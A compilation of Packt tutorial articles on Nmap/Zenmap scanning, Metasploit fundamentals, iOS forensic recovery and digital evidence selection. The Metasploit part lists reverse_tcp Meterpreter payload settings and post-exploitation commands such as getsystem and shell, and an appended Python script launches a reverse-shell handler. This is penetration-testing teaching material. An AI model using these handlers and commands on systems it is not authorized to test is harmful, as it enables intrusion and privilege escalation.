As you can see, Nmap is attempting to discover the operating system (OS) and to tell which version of the web server is running:

Here is an example of running Nmap from the Git Bash application, which lets you run Linux commands on your Windows desktop. This view shows a neat feature of Nmap: if you get bored or anxious and think the system is taking too much time to scan, you can hit the down arrow key and it will print out a status line telling you what percentage of the scan is complete. This is not the same as telling you how much time is left on the scan, but it does give you an idea of what has been done:

Zenmap

Nmap comes with a GUI frontend called Zenmap. Zenmap is a friendly graphic interface for the Nmap application. You will find Zenmap under Applications | Information Gathering | Zenmap. Like many Windows engineers, you may like Zenmap more than Nmap:

Here we see a list of the most common scans in a drop-down box. One of the cool features of Zenmap is that when you set up a scan using the buttons, the application also writes out the command-line version of the command, which will help you learn the command-line flags to use when running Nmap in command-line mode.

Hacker tip

Most hackers are very comfortable with the Linux Command Line Interface (CLI). You want to learn the Nmap commands on the command line because you can use Nmap inside automated Bash scripts and set up cron jobs to make routine scans much simpler. You can set a cron job to run the test in non-peak hours, when the network is quieter, and your tests will have less impact on the network's legitimate users. (A minimal scheduling sketch appears at the end of this article.)

The choice of intense scan produces a command line of nmap -T4 -A -v. This produces a fast scan. The T stands for timing (from 0 to 5), and the default timing is -T3. The faster the timing, the rougher the test, and the more likely you are to be detected if the network is running an Intrusion Detection System (IDS). The -A stands for All, so this single option gets you a deep port scan, including OS identification, and attempts to find the applications listening on the ports and the versions of those applications. Finally, the -v stands for verbose; -vv means very verbose:

Summary

In this article, we learned about penetration testing in a Windows environment. Contrary to popular belief, Windows is not riddled with wide-open security holes ready for attackers to find. We learned how to use Nmap to obtain detailed statistics about the network, making it an indispensable tool in our pen testing kit. Then, we looked at Zenmap, which is a GUI frontend for Nmap and makes it easy for us to view the network. Think of Nmap as flight control using audio transmissions and Zenmap as a big green radar screen; that's how much easier it makes our work.

Resources for Article:

Further resources on this subject:
Bringing DevOps to Network Operations [article]
Installing Magento [article]
Zabbix Configuration [article]
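As promised in the Hacker tip, here is a minimal sketch of a scheduled scan. The target range, output path, and schedule are placeholders to adapt to your own network:

#!/usr/bin/env python
# nightly_scan.py -- schedule with cron, for example:
#   0 2 * * * /usr/bin/python /root/nightly_scan.py
import datetime
import subprocess

target = "10.0.0.0/24"                        # placeholder network range
stamp = datetime.date.today().strftime("%Y%m%d")
outfile = "/root/scans/scan-%s.xml" % stamp   # placeholder output path

# The default -T3 timing keeps the scan gentle; -oX saves XML for later comparison
subprocess.call(["nmap", "-T3", "-A", "-oX", outfile, target])

Comparing successive XML outputs makes it easy to spot new hosts or newly opened ports between runs.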

Getting Started with Metasploit

Packt
22 Jun 2017
10 min read
In this article by Nipun Jaswal, the author of the book Metasploit Bootcamp, we will be covering the following topics:

Fundamentals of Metasploit
Benefits of using Metasploit

(For more resources related to this topic, see here.)

Penetration testing is the art of performing a deliberate attack on a network, web application, server, or any device that requires a thorough checkup from the security perspective. The idea of a penetration test is to uncover flaws while simulating real-world threats. A penetration test is performed to figure out vulnerabilities and weaknesses in systems so that vulnerable systems can stay immune to threats and malicious activities. Achieving success in a penetration test largely depends on using the right set of tools and techniques. A penetration tester must choose the right set of tools and methodologies in order to complete a test. While talking about the best tools for penetration testing, the first one that comes to mind is Metasploit. It is considered one of the most practical tools for carrying out penetration testing today. Metasploit offers a wide variety of exploits, a great exploit development environment, information gathering and web testing capabilities, and much more.

The fundamentals of Metasploit

Now that we have completed the setup of Kali Linux, let us talk about the big picture: Metasploit. Metasploit is a security project that provides exploits and tons of reconnaissance features to aid a penetration tester. Metasploit was created by H.D. Moore back in 2003, and since then, its rapid development has led it to be recognized as one of the most popular penetration testing tools. Metasploit is entirely a Ruby-driven project and offers a great deal of exploits, payloads, encoding techniques, and loads of post-exploitation features.

Metasploit comes in various editions, as follows:

Metasploit Pro: This is a commercial edition that offers tons of great features, such as web application scanning and exploitation and automated exploitation, and is quite suitable for professional penetration testers and IT security teams. The Pro edition is used for advanced penetration tests and enterprise security programs.
Metasploit Express: The Express edition is used for baseline penetration tests. Features in this version of Metasploit include smart exploitation, automated brute-forcing of credentials, and much more. This version is quite suitable for IT security teams in small-to-medium-sized companies.
Metasploit Community: This is a free version with reduced functionality compared to the Express edition. However, for students and small businesses, this edition is a favorable choice.
Metasploit Framework: This is a command-line version with all manual tasks, such as manual exploitation, third-party import, and so on. This release is entirely suitable for developers and security researchers.

You can download Metasploit from the following link: https://www.rapid7.com/products/metasploit/download/editions/

We will be using the Metasploit Community and Framework versions. Metasploit also offers various types of user interfaces, as follows:

The graphical user interface (GUI): This has all the options available at the click of a button. It offers a user-friendly interface that helps to provide cleaner vulnerability management.
The console interface: This is the most preferred interface and the most popular one as well. This interface provides an all-in-one approach to all the options offered by Metasploit.
This interface is also considered one of the most stable interfaces.

The command-line interface: This is the most potent interface, supporting everything from launching exploits to payload generation. However, remembering each and every command while using the command-line interface is a difficult job.
Armitage: Armitage, by Raphael Mudge, added a neat hacker-style GUI to Metasploit. Armitage offers easy vulnerability management, built-in Nmap scans, exploit recommendations, and the ability to automate features using the Cortana scripting language.

Basics of the Metasploit framework

Before we put our hands on the Metasploit framework, let us understand the basic terminologies used in Metasploit. However, the following are not just terminologies but modules that are the heart and soul of the Metasploit project:

Exploit: This is a piece of code which, when executed, will trigger the vulnerability on the target.
Payload: This is a piece of code that runs on the target after successful exploitation. It defines the type of access and actions we need to gain on the target system.
Auxiliary: These are modules that provide additional functionalities such as scanning, fuzzing, sniffing, and much more.
Encoder: Encoders are used to obfuscate modules to avoid detection by a protection mechanism such as an antivirus or a firewall.
Meterpreter: This is a payload that uses in-memory stagers based on DLL injection. It provides a variety of functions to perform on the target, which makes it a popular choice.

Architecture of Metasploit

Metasploit comprises various components, such as extensive libraries, modules, plugins, and tools. A diagrammatic view of the structure of Metasploit is as follows:

Let's see what these components are and how they work. It is best to start with the libraries that act as the heart of Metasploit. Let's understand the use of the various libraries, as explained in the following table:

REX: Handles almost all core functions, such as setting up sockets, connections, and formatting, and all other raw functions
MSF CORE: Provides the underlying API and the actual core that describes the framework
MSF BASE: Provides friendly API support to modules

We have many types of modules in Metasploit, and they differ in their functionality. We have payload modules for creating access channels to exploited systems. We have auxiliary modules to carry out operations such as information gathering, fingerprinting, fuzzing an application, and logging in to various services. Let's examine the basic functionality of these modules, as shown in the following table:

Payloads: Payloads are used to carry out operations such as connecting to or from the target system after exploitation, or performing a particular task such as installing a service and so on. Payload execution is the next step after the system is exploited successfully.
Auxiliary: Auxiliary modules are a special kind of module that performs specific tasks such as information gathering, database fingerprinting, scanning the network to find a particular service, enumeration, and so on.
Encoders: Encoders are used to encode payloads and attack vectors to (or intending to) evade detection by antivirus solutions or firewalls.
NOPs: NOP generators are used for alignment, which results in making exploits stable.
Exploits: The actual code that triggers a vulnerability.

Metasploit framework console and commands

Having gathered knowledge of the architecture of Metasploit, let us now run Metasploit to get hands-on knowledge of the commands and different modules. To start Metasploit, we first need to establish a database connection so that everything we do can be logged into the database. However, using a database also speeds up Metasploit's load time by making use of caches and indexes for all modules. Therefore, let us start the postgresql service by typing in the following command at the terminal:

root@beast:~# service postgresql start

Now, to initialize Metasploit's database, let us initialize msfdb, as shown in the following screenshot:

It is clearly visible in the preceding screenshot that we have successfully created the initial database schema for Metasploit. Let us now start Metasploit's database using the following command:

root@beast:~# msfdb start

We are now ready to launch Metasploit. Let us issue msfconsole in the terminal to start Metasploit, as shown in the following screenshot:

Welcome to the Metasploit console. Let us run the help command to see what other commands are available to us:

The commands in the preceding screenshot are core Metasploit commands, which are used to set/get variables, load plugins, route traffic, unset variables, print the version, find the history of commands issued, and much more. These commands are pretty general. Let's see the module-based commands, as follows:

Everything related to a particular module in Metasploit comes under the module controls section of the help menu. Using the preceding commands, we can select a particular module, load modules from a particular path, get information about a module, show core and advanced options related to a module, and even edit a module inline.
Let us learn some basic commands in Metasploit and familiarize ourselves with their syntax and semantics:

use [auxiliary/exploit/payload/encoder]: To select a particular module. Examples: msf> use exploit/unix/ftp/vsftpd_234_backdoor and msf> use auxiliary/scanner/portscan/tcp
show [exploits/payloads/encoders/auxiliary/options]: To see the list of available modules of a particular type. Examples: msf> show payloads and msf> show options
set [options/payload]: To set a value for a particular object. Examples: msf> set payload windows/meterpreter/reverse_tcp, msf> set LHOST 192.168.10.118, msf> set RHOST 192.168.10.112, msf> set LPORT 4444, and msf> set RPORT 8080
setg [options/payload]: To assign a value to a particular object globally, so that the value does not change when a module is switched. Example: msf> setg RHOST 192.168.10.112
run: To launch an auxiliary module after all the required options are set. Example: msf> run
exploit: To launch an exploit. Example: msf> exploit
back: To unselect a module and move back. Example: msf(ms08_067_netapi)> back
info: To list the information related to a particular exploit/module/auxiliary. Examples: msf> info exploit/windows/smb/ms08_067_netapi and msf(ms08_067_netapi)> info
search: To find a particular module. Example: msf> search hfs
check: To check whether a particular target is vulnerable to the exploit or not. Example: msf> check
sessions: To list the available sessions. Example: msf> sessions [session number]

The following are some useful Meterpreter commands:

sysinfo: To list the system information of the compromised host. Example: meterpreter> sysinfo
ifconfig: To list the network interfaces on the compromised host. Examples: meterpreter> ifconfig and meterpreter> ipconfig (Windows)
arp: To list the IP and MAC addresses of hosts connected to the target. Example: meterpreter> arp
background: To send an active session to the background. Example: meterpreter> background
shell: To drop a cmd shell on the target. Example: meterpreter> shell
getuid: To get the current user details. Example: meterpreter> getuid
getsystem: To escalate privileges and gain SYSTEM access. Example: meterpreter> getsystem
getpid: To get the process ID of the Meterpreter access. Example: meterpreter> getpid
ps: To list all the processes running on the target. Example: meterpreter> ps

If you are using Metasploit for the very first time, refer to http://www.offensive-security.com/metasploit-unleashed/Msfconsole_Commands for more information on basic commands.

Benefits of using Metasploit

Metasploit is an excellent choice when compared to traditional manual techniques because of certain factors, which are listed as follows:

The Metasploit framework is open source
Metasploit supports large testing networks by making use of CIDR identifiers
Metasploit offers quick generation of payloads, which can be changed or switched on the fly
Metasploit leaves the target system stable in most cases
The GUI environment provides a fast and user-friendly way to conduct penetration testing

Summary

Throughout this article, we learned the basics of Metasploit. We learned about the syntax and semantics of various Metasploit commands. We also learned the benefits of using Metasploit.

Resources for Article:

Further resources on this subject:
Approaching a Penetration Test Using Metasploit [article]
Metasploit Custom Modules and Meterpreter Scripting [article]
So, what is Metasploit? [article]
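Before moving on, note that the interactive commands covered in this article can also be replayed non-interactively. The following is a minimal sketch (the payload and addresses are reused from the examples in the table; adapt them to your test network) that writes a Metasploit resource file and feeds it to msfconsole with the -r switch:

#!/usr/bin/env python
# Launch a handler by driving msfconsole with a resource script.
import subprocess
import tempfile

rc = """use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.10.118
set LPORT 4444
exploit -j
"""

with tempfile.NamedTemporaryFile("w", suffix=".rc", delete=False) as f:
    f.write(rc)
    rc_path = f.name

# -q suppresses the banner; -r replays the commands from the file
subprocess.call(["msfconsole", "-q", "-r", rc_path])

The exploit -j command runs the handler as a background job, leaving the console free while it waits for incoming sessions.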

Forensics Recovery

Packt
05 Jan 2016
6 min read
In this article by Bhanu Birani and Mayank Birani, the authors of the book iOS Forensics Cookbook, we discuss forensics recovery and why it matters: in some investigation cases, there is a need to decrypt information from iOS devices, and the data on these devices is usually stored in an encrypted form. In this article, we will focus on various tools and scripts that can be used to read the data from the devices under investigation. We are going to cover the following topics:

DFU and Recovery mode
Extracting iTunes backup

(For more resources related to this topic, see here.)

DFU and Recovery mode

In this section, we'll cover both the DFU mode and the Recovery mode separately.

DFU mode

In this section, we will see how to launch the DFU mode, but before that, let's see what DFU means. DFU stands for Device Firmware Upgrade, which means that this mode is used specifically during iOS upgrades. It is a mode where the device can be connected to iTunes without loading the iBoot boot loader. Your device screen will be completely black in DFU mode because neither the boot loader nor the operating system is loaded. DFU bypasses iBoot so that you can downgrade your device.

How to do it...

We need to follow these steps in order to launch a device in DFU mode:

Turn off your device.
Connect your device to the computer.
Press the Home button and the Power button together for 10 seconds.
Now, release the Power button and keep holding the Home button till your computer detects the connected device.
After some time, iTunes should detect your device. Make sure that your phone does not show any Restore logo on the device; if it does, then you are in Recovery mode, not in DFU.

Once your DFU operations are done, you can hold the Power and Home buttons till you see the Apple logo in order to return to a normally functioning device. This is the easiest way to recover a device from a faulty backup file.

Recovery mode

In this section, you will learn about the Recovery mode of our iOS devices. To dive deep into the Recovery mode, we first need to understand a few basics, such as which boot loader is used by iOS devices, how the boot takes place, and so on. We will explore all such concepts in order to simplify the understanding of the Recovery mode. All iOS devices use the iBoot boot loader in order to load the operating system. The iBoot state used for recovery and restore purposes is called Recovery mode. iOS cannot be downgraded in this state, as iBoot is loaded. iBoot also prevents any custom firmware from being flashed onto the device unless it is jailbroken, that is, "pwned".

How to do it...

The following are the detailed steps to launch the Recovery mode on any iOS device:

You need to turn off your iOS device in order to launch the Recovery mode.
Disconnect all the cables from the device and remove it from the dock if it is connected.
Now, while holding the Home button, connect your iOS device to the computer using the cable.
Hold the Home button till you see the Connect to iTunes screen. Once you see the screen, you have entered the Recovery mode.
Now you will receive a popup on your Mac saying "iTunes has detected your iDevice in recovery mode".

Now you can use iTunes to restore the device in the Recovery mode. Make sure your data is backed up, because the recovery will restore the device to factory settings. You can restore from the backup later as well. Once your Recovery mode operations are complete, you will need to escape from the Recovery mode.
To escape, just press the Power button and the Home button concurrently for 10-12 seconds.

Extracting iTunes backup

Extracting logical information from the iTunes backup is crucial for a forensics investigation. There is a full stack of tools available for extracting data from iTunes backups, ranging from open source tools to paid ones. Some of these forensic tools are Oxygen Forensics Suite, AccessData MPE+, EnCase, iBackupBot, DiskAid, and so on. The famous open source tools are iPhone Backup Analyzer and iPhone Analyzer. In this section, we are going to learn how to use the iPhone backup extractor tool.

How to do it...

The iPhone backup extractor is an open source forensic tool that can extract information from device backups. However, there is one constraint: the backup should be created with iTunes 10 or later. Follow these steps to extract data from an iTunes backup:

Download the iPhone backup extractor from http://supercrazyawesome.com/.
Make sure that all your iTunes backups are located in this directory: ~/Library/Application Support/MobileSync/Backup. In case you don't have the required backup at this location, you can also copy-paste it there.
The application will show a prompt after it is launched. The prompt should look similar to the following screenshot:
Now tap on the Read Backups button to read the backup available at ~/Library/Application Support/MobileSync/Backup.
Now, you can choose any option, as shown here:
This tool also allows you to extract data for an individual application and enables you to read the iOS filesystem backup.
Now, you can select the file you want to extract. Once the file is selected, click on Extract. You will get a popup asking for the destination directory. This complete process should look similar to the following screenshot:

There are various other tools similar to this; iPhone Backup Browser is one of them, and it lets you view the decrypted data stored in your backup files. This tool supports only the Windows operating system as of now. You can download this software from http://code.google.com/p/iphonebackupbrowser/.

Summary

In this article, we covered how to launch the DFU and Recovery modes. We also learned how to extract logical information from the iTunes backup using the iPhone backup extractor tool.

Resources for Article:

Further resources on this subject:
Signing up to be an iOS developer [article]
Exploring Swift [article]
Introduction to GameMaker: Studio [article]
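As a small illustration of what lives in that backup directory, the following sketch (not part of the iPhone backup extractor) lists each backup folder and reads its Info.plist with Python's plistlib to print the device name and model; the path assumes the default macOS location discussed above:

import os
import plistlib

backup_root = os.path.expanduser(
    "~/Library/Application Support/MobileSync/Backup")

for entry in sorted(os.listdir(backup_root)):
    info_path = os.path.join(backup_root, entry, "Info.plist")
    if os.path.isfile(info_path):
        with open(info_path, "rb") as f:
            info = plistlib.load(f)   # on Python 2, use plistlib.readPlist
        print(entry, "->", info.get("Device Name"), info.get("Product Type"))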

Selecting and Analyzing Digital Evidence

Packt
08 Apr 2016
13 min read
In this article, Richard Boddington, the author of Practical Digital Forensics, explains how the recovery and preservation of digital evidence has traditionally involved imaging devices and storing the data in bulk in a forensic file or, more effectively, in a forensic image container, notably the ILookIX .ASB container. The recovery of smaller, more manageable datasets from larger datasets on a device or network system using the ISeekDiscovery automaton is now a reality. Whether the practitioner examines an image container or an extraction of information in the ISeekDiscovery container, it should be possible to overview the recovered information and develop a clearer perception of the type of evidence that should be located. Once acquired, the image or device may be searched to find evidence, and locating evidence requires a degree of analysis combined with practitioner knowledge and experience. The process of selection involves analysis, and as new leads open up, the search for more evidence intensifies until, ultimately, a thorough search is completed. The searching process involves the analysis of possible evidence, from which evidence may be discarded, collected, or tagged for later reexamination, thereby instigating the selection process. The final two stages of the investigative process are the validation of the evidence, aimed at determining its reliability, relevance, authenticity, accuracy, and completeness, and finally, the presentation of the evidence to interested parties, such as the investigators, the legal team, and ultimately, the legal adjudicating body.

(For more resources related to this topic, see here.)

Locating digital evidence

Locating evidence in the all-too-common large dataset requires some filtration of extraneous material, which has, until recently, been a mainly manual task of sorting the wheat from the chaff. But it is important to clear the clutter and noise of busy operating systems and applications, from which only a small amount of evidence really needs to be gleaned. Search processes involve searching in a file system and inside files, and common searches for files are based on names or patterns in their names, keywords in their content, and temporal data (metadata) such as the last access or written time. A pragmatic approach to the examination is necessary, where the onus is on the practitioner to create a list of keywords or search terms to cull specific, probative, and case-related information from very large groups of files.

Searching desktops and laptops

Home computer networks are normally linked to the Internet via a modem and consist of various peripheral devices: a scanner, a printer, an external hard drive, a thumb drive storage device, a digital camera, a mobile phone, and a range of users. In an office network, this would be a more complicated system. The connections between these devices, the terminal, and the Internet leave a range of traces and logging records on the terminal, on some of the devices, and on the Internet. E-mail messages will be recorded externally on the e-mail server, the printer may keep a record of print jobs, and the external storage devices and communication media also leave logs and data linked to the terminal. All of this data may assist in the reconstruction of key events and provide evidence related to the investigation. Using the logical examination process (booting up the image), it is possible to recover a limited number of deleted files and reconstruct some of the key events of relevance to an investigation.
It may not always be possible to boot up a forensic image and view it in its logical format, which is easier and more familiar to users. However, viewing the data inside a forensic image in its physical format provides unaltered metadata and a greater number of deleted, hidden, and obscured files, which provide accurate information about applications and files. It is possible to view the containers that hold these histories and search records that have been recovered and stored in a forensic file container.

Selecting digital evidence

For those unfamiliar with investigations, it is quite common to misread the readily available evidence and draw incorrect conclusions. Business managers attempting to analyze what they consider to be the facts of a case would be wise to seek legal assistance in selecting and evaluating evidence on which they may wish to base a case. Selecting the evidence involves analysis of the located evidence to determine what events occurred in the system, their significance, and their probative value to the case. The selection analysis stage requires the practitioner to carefully examine the available digital evidence, ensuring that they do not misinterpret the evidence and make imprudent presumptions without carefully cross-checking the information. It is a fact-finding process where an attempt is made to develop a plausible reconstruction of the facts. As in conventional crime investigations, practitioners should look for evidence that suggests or indicates motive (why?), means (how?), and opportunity (when?) for suspects to commit the crime, but in cases dependent on digital evidence, it can be a vexatious process. There are often too many potential suspects, which complicates the process of linking the suspect to the events.

The following figure shows a typical family network setup using Wi-Fi connections to the home modem that facilitates connection to the Internet. In this case, the parents provided the broadband service for themselves and for three other family members. The girlfriend of one of the children completed her university assignments on his computer and synchronized her iPad to his device.

The complexity of a typical household network and determining the identity of the transgressor

More effective forensic tools

Various forensic tools are available to assist the practitioner in selecting and collating data for examination, analysis, and investigation. Sorting order from the chaos of even a small personal computer can be a time-consuming and frustrating process. As the digital forensic discipline develops, better and more reliable forensic tools have been developed to assist practitioners in locating, selecting, and collating evidence from larger, complex datasets. To varying degrees, most digital forensic tools used to view and analyze forensic images or attached devices provide helpful user interfaces for locating and categorizing information relevant to the examination. The most advanced application that provides access to and convenient viewing of files is the Category Explorer feature in ILookIX, which divides files by type, signature, and properties. Category Explorer also allows the practitioner to create custom categories to group files by relevance. For example, in a criminal investigation involving a conspiracy, the practitioner could create a category for the first individual and a category for the second individual.
As files are reviewed, they would then be added to either or both categories. Unlike tags, files can be added to multiple categories, and the categories can be given descriptive names.

Deconstructing files

The deconstruction of files involves processing compound files, such as archives, e-mail stores, registry stores, or other files, to extract useful and usable data from a complex file format and generate reports. Manual deconstruction adds significantly to the time taken to complete an examination. Deconstructable files are compound files that can be further broken down into smaller parts, such as e-mails, archives, or thumb stores of JPG files. Once the deconstruction is completed, the files will move into either the deconstructed files folder or the deconstruction failed files folder. Deconstructable files will now be broken out further: e-mail, graphics, archives, and so on.

Searching for files

Indexing is the process of generating a table of text strings that can then be searched almost instantly any number of times. The two main uses of indexing are to create a dictionary to use when cracking passwords and to index the words for almost-instant searching. Indexing is also valuable when creating a dictionary or using any of the analysis functions built into ILookIX. ILookIX facilitates the indexing of the entire media at the time of initial processing, all at once. This can also be done after processing. Indexing facilitates searching through files and archives, the Windows Registry, e-mail lists, and unallocated space. This function is highly customizable via the setup option in order to optimize it for searching or for creating a custom dictionary for password cracking. Sound indexing ensures speedy and accurate searching.

Searching is the process of having ILookIX look through the evidence for a specific item, such as a string of text or an expression. An expression, in terms of searching, is a pattern used to structure data in a search, such as a credit card number or an e-mail address.

The Event Analysis tool

ILookIX's Event Analysis tool provides the practitioner with a graphical representation of events on the subject system, such as file creation, access, or modification; e-mails sent or received; and other events such as the modification of the Master File Table on an NTFS system. The application allows the practitioner to zoom in on any point on the graph to view more specific details. Clicking on any bar on the graph will return the view to the main ILookIX window and display the items from the selected date bar in the List Pane. This can be most helpful when analyzing events during specific periods.

The Lead Analysis tool

Lead Analysis is an interactive evidence model embedded in ILookIX that allows the practitioner to assimilate known facts into a graphic representation that directly links unseen objects. It provides the answers as the practitioner increases the detail of the design surface and brings into view specific relationships that could otherwise go unseen. The primary aim of Lead Analysis is to help discover links within the case data that may not be evident or intuitive, that the practitioner may not be aware of directly, or that the practitioner has too little background knowledge of to form relationships manually. Instead of finding and making note of various pieces of information, the analysis is presented as an easy-to-use link model. The complexity of the modeling is removed so that it gives the clearest possible method of discovery.
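Before going further, it helps to picture what the index built during processing actually is. The following is a generic sketch of an inverted index, a conceptual illustration only and not ILookIX's internal format, assuming a folder of plain-text files named evidence:

import os
import re
from collections import defaultdict

index = defaultdict(set)   # word -> set of files containing it

for name in os.listdir("evidence"):
    path = os.path.join("evidence", name)
    with open(path, "r") as f:
        for word in re.findall(r"[a-z0-9]+", f.read().lower()):
            index[word].add(path)

# A keyword lookup is now a dictionary access rather than a rescan of the evidence
print(sorted(index.get("divorce", [])))

Once such a table is built, any number of keyword searches run against it rather than against the media itself, which is why indexed searching is almost instant.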
The analysis is based on the current index database, so it is essential to index case data prior to initiating an analysis. Once a list of potential links has been generated, it is important to review them to see whether any are potentially relevant. Highlight any that are, and it will then be possible to look for words in the catalogues if they have been included. In the example scenario, the word divorce was located, as it was known that Sarah was divorced from the owner of the computer (the initial suspect). By selecting any word with a single left-click and clicking on the green arrow to link it to Sarah, as shown below, relationships can be uncovered that are not always clear during the first inspection of the data.

Each of the stated facts becomes one starting lead on the canvas. If the nodes are related, it is easy to model that relationship by manually linking them together: select the first Lead Object to link, right-click, and select Add a New Port from the menu. This is then repeated for the second Lead Object that the practitioner wants to link. By simply clicking on the new port of the selected object that needs to be linked from and dragging to the port of the Lead Object that it should be linked to, a line will appear linking the two together. It is then possible to iterate this process using each start node or discovered node until it is possible to make sense of the total case data. A simple relationship between suspects, locations, and even concepts is illustrated in the following screenshot:

ILookIX Lead Analysis discovering relationships between various entities

Analyzing e-mail datasets

Analyzing and selecting evidence from large e-mail datasets is a common task for the practitioner. ILookIX's embedded application E-mail Linkage Analysis is an interactive evidence model that helps practitioners discover links between the correspondents within e-mail data. The analysis is presented as an easy-to-use link model; the complexity of the modeling is removed to provide the clearest possible method of discovery. The results of the analysis are saved at the end of the modeling session for future editing. If there is a large amount of e-mail to process, generating this analysis may take a few minutes. Once the analysis is displayed, the user will see the e-mail linkage itself. A line between correspondents indicates that they have a relationship of some type; in particular, line thickness indicates the frequency of traffic between two correspondents, so thicker flow lines indicate more traffic. On the canvas, once the analysis is generated, the user may select any e-mail addressee node by left-clicking on it once, and ILookIX will initiate a search for that addressee and list all e-mails where the selected addressee was a correspondent. Creating the analysis is really simple, and one of the most immediately valuable results it provides is group identification, as shown in the following screenshot. Users may make their own connection lines by clicking on an addressee node point and dragging to another node point. Nodes can be deleted to allow linkage between smaller groups of individuals.

The E-mail Linkage tool showing relationships of possible relevance to a case
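The linkage model itself is proprietary to ILookIX, but the underlying idea can be sketched generically: count how often each sender/recipient pair appears in a mail store and treat higher counts as thicker lines. The following sketch assumes an mbox export named evidence.mbox:

import mailbox
from collections import Counter

links = Counter()
for msg in mailbox.mbox("evidence.mbox"):
    sender = (msg.get("From") or "").strip()
    for field in ("To", "Cc"):
        for addr in (msg.get(field) or "").split(","):
            addr = addr.strip()
            if sender and addr:
                links[(sender, addr)] += 1

# The heaviest correspondent pairs surface first
for (sender, addr), count in links.most_common(10):
    print("%4d  %s -> %s" % (count, sender, addr))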
The Volume Shadow Copy analysis tools

Shadow volumes, also known as the Volume Snapshot Service (VSS), use a service that creates point-in-time copies of files. The service is built into Windows Vista, 7, 8, and 10 and is turned on by default. ILookIX can recover true copies of overwritten files from shadow volumes, as long as they resided on the volume at the time the snapshot was created. VSS recovery is a method of recovering extant and deleted files from the volume snapshots available on the system. ILookIX, unlike any other forensic tool, is capable of reconstructing volume shadow copies, either differential or full, including deleted files and folders.

In the test scenario, the tool recovered a total of 87,000 files, equating to conventional tool recovery rates. Using ILookIX's Xtreme File Recovery, some 337,000 files were recovered. The Maximal Full Volume Shadow Snapshot application recovered a total of 797,000 files. Using the differential process, 354,000 files were recovered, which filtered out 17,000 additional files for further analysis. This enabled the detection of e-mail messages and attachments and Windows Registry changes that would normally remain hidden.

Summary

This article described in detail the general process of locating and selecting digital evidence. It also explained the nature of digital evidence and provided examples of its value in supporting a legal case. Various advanced analysis and recovery tools were demonstrated, showing the reader how technology can make the location and selection processes faster and more efficient. Some of these tools are not new but have been enhanced, while others are innovative and seek out evidence normally unavailable to the practitioner.

Resources for Article:

Further resources on this subject:
Mobile Phone Forensics – A First Step into Android Forensics [article]
Introduction to Mobile Forensics [article]
BackTrack Forensics [article]